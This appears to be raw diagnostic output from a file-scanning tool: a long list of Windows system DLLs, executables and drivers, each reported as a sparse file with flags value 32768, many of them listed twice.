File "C:\Windows\System32\wship6.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wlanapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\bthprops.cpl" is sparse (flags = 32768)

File "C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.447_none_89c64d28dafea4b9\comctl32.dll" is sparse (flags = 32768)

File "C:\Windows\AppPatch\AcGenral.dll" is sparse (flags = 32768)

File "C:\Windows\AppPatch\AcGenral.dll" is sparse (flags = 32768)

File "C:\Windows\System32\samcli.dll" is sparse (flags = 32768)

File "C:\Windows\System32\msacm32.dll" is sparse (flags = 32768)

File "C:\Windows\AppPatch\AcLayers.dll" is sparse (flags = 32768)

File "C:\Windows\AppPatch\AcLayers.dll" is sparse (flags = 32768)

File "C:\Windows\System32\DHCPCSVC6.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\DHCPCSVC6.DLL" is sparse (flags = 32768)

File "C:\Program Files\Windows Defender\MsMpEng.exe" is sparse (flags = 32768)

File "C:\Windows\System32\msxml3.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dasHost.exe" is sparse (flags = 32768)

File "C:\Windows\System32\MMDevAPI.dll" is sparse (flags = 32768)

File "C:\Windows\System32\AudioSes.dll" is sparse (flags = 32768)

File "C:\Windows\System32\AudioSes.dll" is sparse (flags = 32768)

File "C:\Windows\System32\WinTypes.dll" is sparse (flags = 32768)

File "C:\Windows\System32\WinTypes.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wbem\wbemprox.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wbemcomn.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wbem\wbemsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wbem\fastprox.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wbem\WmiPrvSE.exe" is sparse (flags = 32768)

File "C:\Windows\System32\sihost.exe" is sparse (flags = 32768)

File "C:\Windows\System32\TASKHOSTW.EXE" is sparse (flags = 32768)

File "C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.14393.321_none_baab3cb4359688b4\GdiPlus.dll" is sparse (flags = 32768)

File "C:\Windows\System32\WINDOWSCODECS.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WINDOWSCODECS.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\DWrite.dll" is sparse (flags = 32768)

File "C:\Windows\System32\DWrite.dll" is sparse (flags = 32768)

File "C:\Windows\System32\msimg32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dbghelp.dll" is sparse (flags = 32768)

File "C:\Windows\System32\mscms.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dbgcore.dll" is sparse (flags = 32768)

File "C:\Windows\System32\conhost.exe" is sparse (flags = 32768)

File "C:\Windows\explorer.exe" is sparse (flags = 32768)

File "C:\Windows\explorer.exe" is sparse (flags = 32768)

File "C:\Program Files\Windows Defender\NisSrv.exe" is sparse (flags = 32768)

File "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\SHELLEXPERIENCEHOST.EXE" is sparse (flags = 32768)

File "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\SHELLEXPERIENCEHOST.EXE" is sparse (flags = 32768)

File "C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\051a282e157a228405b2e0d867c3ce1d\PresentationCore.ni.dll" is sparse (flags = 32768)

File "C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\5272cb4aeec65bec2fffb45e9cb22910\PresentationFramework.ni.dll" is sparse (flags = 32768)

File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f6ebd52be27fe627fed0d185c6a9c0d5\System.Core.ni.dll" is sparse (flags = 32768)

File "C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\5751e969e4789e60d3ad463cb6024006\WindowsBase.ni.dll" is sparse (flags = 32768)

File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\04c4f83e0b62ff553abff98943e45f42\System.Xaml.ni.dll" is sparse (flags = 32768)

File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\c2abcda8f96d67fa6ff5665fd21dddff\System.Drawing.ni.dll" is sparse (flags = 32768)

File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\c02fbf560e52a1aab432a90d4c613af4\System.Windows.Forms.ni.dll" is sparse (flags = 32768)

File "C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFGFX_V0400.DLL" is sparse (flags = 32768)

File "C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFGFX_V0400.DLL" is sparse (flags = 32768)

File "C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PRESENTATIONNATIVE_V0400.DLL" is sparse (flags = 32768)

File "C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PRESENTATIONNATIVE_V0400.DLL" is sparse (flags = 32768)

File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\aa9c29b70b4cceab890eb841f89d73e9\System.Configuration.ni.dll" is sparse (flags = 32768)

File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7532301b00fac8def2f526ca8b480e11\System.Xml.ni.dll" is sparse (flags = 32768)

File "C:\Windows\System32\d3d9.dll" is sparse (flags = 32768)

File "C:\Windows\System32\d3d9.dll" is sparse (flags = 32768)

File "C:\Windows\System32\WINDOWSCODECSEXT.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WINDOWSCODECSEXT.DLL" is sparse (flags = 32768)

File "C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\def8702c6e883330fb8cb8e3f5c5e665\PresentationFramework.Aero2.ni.dll" is sparse (flags = 32768)

File "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSCORSECIMPL.DLL" is sparse (flags = 32768)

File "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSCORSECIMPL.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\gpapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\gpapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\cryptnet.dll" is sparse (flags = 32768)

File "C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PenIMC.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wisp.dll" is sparse (flags = 32768)

File "C:\Windows\System32\atlthunk.dll" is sparse (flags = 32768)

File "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\tpcps.dll" is sparse (flags = 32768)

File "C:\Windows\System32\DATAEXCHANGE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\DATAEXCHANGE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\dcomp.dll" is sparse (flags = 32768)

File "C:\Windows\System32\d3d11.dll" is sparse (flags = 32768)

File "C:\Windows\System32\d3d11.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dxgi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dxgi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\msctfui.dll" is sparse (flags = 32768)

File "C:\Windows\System32\SETTINGSYNCHOST.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\SETTINGSYNCHOST.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\RUNTIMEBROKER.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\SEARCHINDEXER.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\SEARCHINDEXER.EXE" is sparse (flags = 32768)

File "C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9268_none_d08e1538442a243e\msvcr80.dll" is sparse (flags = 32768)

File "C:\Program Files\Windows Defender\MSASCuiL.exe" is sparse (flags = 32768)

File "C:\Windows\System32\opengl32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\glu32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\ddraw.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dciman32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dciman32.dll" is sparse (flags = 32768)

File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\272d1cf3a7cbd4cd648a2ff2d7a8889a\System.Runtime.Remoting.ni.dll" is sparse (flags = 32768)

File "C:\Windows\System32\NapiNSP.dll" is sparse (flags = 32768)

File "C:\Windows\System32\pnrpnsp.dll" is sparse (flags = 32768)

File "C:\Windows\System32\nlaapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\nlaapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\winrnr.dll" is sparse (flags = 32768)

File "C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9247_none_5090cb78bcba4a35\msvcp90.dll" is sparse (flags = 32768)

File "C:\Windows\WinSxS\x86_microsoft.vc90.mfc_1fc8b3b9a1e18e3b_9.0.30729.6161_none_4bf7e3e2bf9ada4c\mfc90u.dll" is sparse (flags = 32768)

File "C:\Windows\WinSxS\x86_microsoft.vc90.mfcloc_1fc8b3b9a1e18e3b_9.0.30729.6161_none_49768ef57548175e\MFC90ENU.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\upnphost.dll" is sparse (flags = 32768)

File "C:\Windows\System32\ssdpapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\oledlg.dll" is sparse (flags = 32768)

File "C:\Windows\System32\edputil.dll" is sparse (flags = 32768)

File "C:\Windows\System32\secur32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\usp10.dll" is sparse (flags = 32768)

File "C:\Windows\System32\webio.dll" is sparse (flags = 32768)

File "C:\Windows\System32\schannel.dll" is sparse (flags = 32768)

File "C:\Windows\System32\MSKEYPROTECT.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\MSKEYPROTECT.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\ncrypt.dll" is sparse (flags = 32768)

File "C:\Windows\System32\ntasn1.dll" is sparse (flags = 32768)

File "C:\Windows\System32\NCRYPTSSLP.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\NCRYPTSSLP.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\dpapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\FONTDRVHOST.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\FONTDRVHOST.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\taskschd.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dssenh.dll" is sparse (flags = 32768)

File "C:\Windows\System32\ntlanman.dll" is sparse (flags = 32768)

File "C:\Windows\System32\drprov.dll" is sparse (flags = 32768)

File "C:\Windows\System32\davclnt.dll" is sparse (flags = 32768)

File "C:\Windows\System32\davhlpr.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wsock32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\cabinet.dll" is sparse (flags = 32768)

File "C:\Windows\System32\fltLib.dll" is sparse (flags = 32768)

File "C:\Windows\System32\netprofm.dll" is sparse (flags = 32768)

File "C:\Windows\System32\npmproxy.dll" is sparse (flags = 32768)

File "C:\Windows\System32\actxprxy.dll" is sparse (flags = 32768)

File "C:\Windows\System32\actxprxy.dll" is sparse (flags = 32768)

File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Web\31891cda2f40006af1f149bf856c17ca\System.Web.ni.dll" is sparse (flags = 32768)

File "C:\Windows\Microsoft.NET\Framework\v4.0.30319\WEBENGINE4.DLL" is sparse (flags = 32768)

File "C:\Windows\Microsoft.NET\Framework\v4.0.30319\WEBENGINE4.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\rasapi32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\rasapi32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\rasman.dll" is sparse (flags = 32768)

File "C:\Windows\System32\rtutils.dll" is sparse (flags = 32768)

File "C:\Windows\System32\ninput.dll" is sparse (flags = 32768)

File "C:\Windows\System32\hid.dll" is sparse (flags = 32768)

File "C:\Windows\System32\credui.dll" is sparse (flags = 32768)

File "C:\Windows\System32\FIREWALLAPI.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\FIREWALLAPI.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\fwbase.dll" is sparse (flags = 32768)

File "C:\Windows\System32\FWPOLICYIOMGR.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\FWPOLICYIOMGR.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\DIRECTMANIPULATION.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\EXPLORERFRAME.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\EXPLORERFRAME.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\wscapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wscapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\samlib.dll" is sparse (flags = 32768)

File "C:\Windows\System32\samlib.dll" is sparse (flags = 32768)

File "C:\Windows\System32\qwave.dll" is sparse (flags = 32768)

File "C:\Windows\System32\traffic.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wmiclnt.dll" is sparse (flags = 32768)

File "C:\Windows\System32\Speech\Common\sapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\msdmo.dll" is sparse (flags = 32768)

File "C:\Windows\System32\avrt.dll" is sparse (flags = 32768)

File "C:\Windows\System32\THUMBCACHE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\THUMBCACHE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\POLICYMANAGER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\POLICYMANAGER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\MSVCP110_WIN.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\MSVCP110_WIN.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\shdocvw.dll" is sparse (flags = 32768)

File "C:\Program Files (x86)\Windows Defender\MpOAV.dll" is sparse (flags = 32768)

File "C:\Windows\System32\pcacli.dll" is sparse (flags = 32768)

File "C:\Windows\System32\devrtl.dll" is sparse (flags = 32768)

File "C:\Windows\System32\devenum.dll" is sparse (flags = 32768)

File "C:\Windows\System32\devenum.dll" is sparse (flags = 32768)

File "C:\Windows\System32\MFKSPROXY.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\MFKSPROXY.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\MFSENSORGROUP.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\MFSENSORGROUP.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\mfplat.dll" is sparse (flags = 32768)

File "C:\Windows\System32\mfplat.dll" is sparse (flags = 32768)

File "C:\Windows\System32\RTWorkQ.dll" is sparse (flags = 32768)

File "C:\Windows\System32\RTWorkQ.dll" is sparse (flags = 32768)

File "C:\Windows\System32\ksproxy.ax" is sparse (flags = 32768)

File "C:\Windows\System32\ksproxy.ax" is sparse (flags = 32768)

File "C:\Windows\System32\ksuser.dll" is sparse (flags = 32768)

File "C:\Windows\System32\vidcap.ax" is sparse (flags = 32768)

File "C:\Windows\System32\Kswdmcap.ax" is sparse (flags = 32768)

File "C:\Windows\System32\mfc42.dll" is sparse (flags = 32768)

File "C:\Windows\System32\odbc32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\SMARTSCREENPS.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\SMARTSCREENPS.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\fontsub.dll" is sparse (flags = 32768)

File "C:\Windows\System32\fontsub.dll" is sparse (flags = 32768)

File "C:\Windows\System32\mf.dll" is sparse (flags = 32768)

File "C:\Windows\System32\MSMPEG2VDEC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\MSMPEG2VDEC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\MFPERFHELPER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\MFPERFHELPER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\dxva2.dll" is sparse (flags = 32768)

File "C:\Windows\System32\msvproc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\msvproc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\D3DCOMPILER_47.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\D3DCOMPILER_47.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\MFH264ENC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\MFH264ENC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\dllhost.exe" is sparse (flags = 32768)

File "C:\Windows\System32\wer.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wer.dll" is sparse (flags = 32768)

File "C:\Windows\System32\Faultrep.dll" is sparse (flags = 32768)

File "C:\Windows\System32\loadperf.dll" is sparse (flags = 32768)

File "C:\Windows\System32\pdh.dll" is sparse (flags = 32768)

File "C:\Windows\System32\mlang.dll" is sparse (flags = 32768)

File "C:\Windows\System32\msxml6.dll" is sparse (flags = 32768)

File "C:\Windows\System32\msxml6.dll" is sparse (flags = 32768)

File "C:\Windows\System32\WINDOWS.NETWORKING.CONNECTIVITY.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WINDOWS.NETWORKING.CONNECTIVITY.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\FAMILYSAFETYEXT.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\FAMILYSAFETYEXT.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\ONECOREUAPCOMMONPROXYSTUB.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\ONECOREUAPCOMMONPROXYSTUB.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\wlidprov.dll" is sparse (flags = 32768)

File "C:\Windows\System32\APPLICATIONFRAMEHOST.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\APPLICATIONFRAMEHOST.EXE" is sparse (flags = 32768)

File "C:\Windows\ImmersiveControlPanel\SYSTEMSETTINGS.EXE" is sparse (flags = 32768)

File "C:\Windows\ImmersiveControlPanel\SYSTEMSETTINGS.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\SEARCHPROTOCOLHOST.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\SEARCHPROTOCOLHOST.EXE" is sparse (flags = 32768)

File "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" is sparse (flags = 32768)

File "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" is sparse (flags = 32768)

File "C:\Windows\System32\SMARTSCREEN.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\SMARTSCREEN.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\d2d1.dll" is sparse (flags = 32768)

File "C:\Windows\System32\d2d1.dll" is sparse (flags = 32768)

File "C:\Windows\System32\d3d10_1.dll" is sparse (flags = 32768)

File "C:\Windows\System32\D3D10_1CORE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\D3D10_1CORE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\D3D10WARP.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\D3D10WARP.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\msimtf.dll" is sparse (flags = 32768)

File "C:\Windows\System32\sppc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\WEBSERVICES.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\normaliz.dll" is sparse (flags = 32768)

File "C:\Windows\System32\hlink.dll" is sparse (flags = 32768)

File "C:\Windows\System32\mshtml.dll" is sparse (flags = 32768)

File "C:\Windows\System32\mshtml.dll" is sparse (flags = 32768)

File "C:\Windows\System32\MICROSOFTACCOUNTTOKENPROVIDER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\MICROSOFTACCOUNTTOKENPROVIDER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WINDOWS.GLOBALIZATION.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WINDOWS.GLOBALIZATION.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\BCP47LANGS.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\BCP47LANGS.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\GLOBINPUTHOST.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\GLOBINPUTHOST.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\LOCKAPPHOST.EXE" is sparse (flags = 32768)

File "C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe" is sparse (flags = 32768)

File "C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe" is sparse (flags = 32768)

File "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\TabTip32.exe" is sparse (flags = 32768)

File "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\TabTip32.exe" is sparse (flags = 32768)

File "C:\Windows\System32\audiodg.exe" is sparse (flags = 32768)

File "C:\Windows\System32\audiodg.exe" is sparse (flags = 32768)

File "C:\Windows\System32\INSTALLAGENT.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\INSTALLAGENT.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\INSTALLAGENTUSERBROKER.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\INSTALLAGENTUSERBROKER.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\COMPATTELRUNNER.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\COMPATTELRUNNER.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\NETWORKEXPLORER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\NETWORKEXPLORER.DLL" is sparse (flags = 32768)

File "C:\Windows\SysWOW64\cmd.exe" is sparse (flags = 32768)

File "C:\Windows\System32\cmdext.dll" is sparse (flags = 32768)

File "C:\Windows\System32\SEARCHFILTERHOST.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\SEARCHFILTERHOST.EXE" is sparse (flags = 32768)

File "C:\Windows\SysWOW64\ONEDRIVESETUP.EXE" is sparse (flags = 32768)

File "C:\Windows\SysWOW64\ONEDRIVESETUP.EXE" is sparse (flags = 32768)

File "C:\Program Files\Windows Mail\wab.exe" is sparse (flags = 32768)

File "C:\Windows\System32\credssp.dll" is sparse (flags = 32768)

File "C:\Windows\System32\credssp.dll" is sparse (flags = 32768)

File "C:\Windows\System32\userinit.exe" is sparse (flags = 32768)

File "C:\Windows\System32\scecli.dll" is sparse (flags = 32768)

File "C:\Windows\System32\msv1_0.dll" is sparse (flags = 32768)

File "C:\Windows\System32\msv1_0.dll" is sparse (flags = 32768)

File "C:\Windows\System32\kerberos.dll" is sparse (flags = 32768)

File "C:\Windows\System32\kerberos.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wdigest.dll" is sparse (flags = 32768)

File "C:\Windows\System32\TSpkg.dll" is sparse (flags = 32768)

File "C:\Windows\System32\TSpkg.dll" is sparse (flags = 32768)

File "C:\Windows\System32\pku2u.dll" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\appid.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\AcpiDev.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\AcpiDev.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\1394ohci.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\1394ohci.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\flpydisk.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\flpydisk.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\mspclock.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\acpiex.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\acpi.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\acpi.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\vpci.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\isapnp.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\isapnp.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\acpipmi.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\acpipmi.sys" is sparse (flags = 32768)

File "C:\Windows\System32\Locator.exe" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\amdk8.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\amdk8.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\acpipagr.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\acpipagr.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\acpitime.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\acpitime.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\mpsdrv.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\afd.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\sdstor.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\sdstor.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\ahcache.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\BthhfHid.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\BthhfHid.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\asyncmac.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\srv.sys" is sparse (flags = 32768)

File "C:\Windows\System32\alg.exe" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\BASICRENDER.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\BASICRENDER.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\amdppm.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\amdppm.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\usbccgp.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\usbccgp.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\APPLOCKERFLTR.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\APPLOCKERFLTR.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\bthmodem.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\bthmodem.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\hidbatt.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\hidbatt.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\wcnfs.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\wcifs.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\srv2.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\atapi.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\atapi.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\BTHUSB.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\BTHUSB.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\BASICDISPLAY.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\BASICDISPLAY.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\Ndu.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\pciide.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\pciide.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\bowser.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\bowser.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\WdFilter.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\iorate.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\scfilter.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\scfilter.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\BTHAVRCPTG.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\BTHAVRCPTG.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\volmgr.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\volmgr.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\BUTTONCONVERTER.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\BUTTONCONVERTER.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\BTHHFENUM.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\BTHHFENUM.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\bthport.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\cdfs.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\clfs.sys" is sparse (flags = 32768)

File "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSVCHOST.EXE" is sparse (flags = 32768)

File "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSVCHOST.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\cdrom.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\cdrom.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\circlass.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\circlass.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\registry.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\mup.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\CmBatt.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\CmBatt.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\cng.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\CNGHWASSIST.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\condrv.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\dam.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\dfsc.sys" is sparse (flags = 32768)

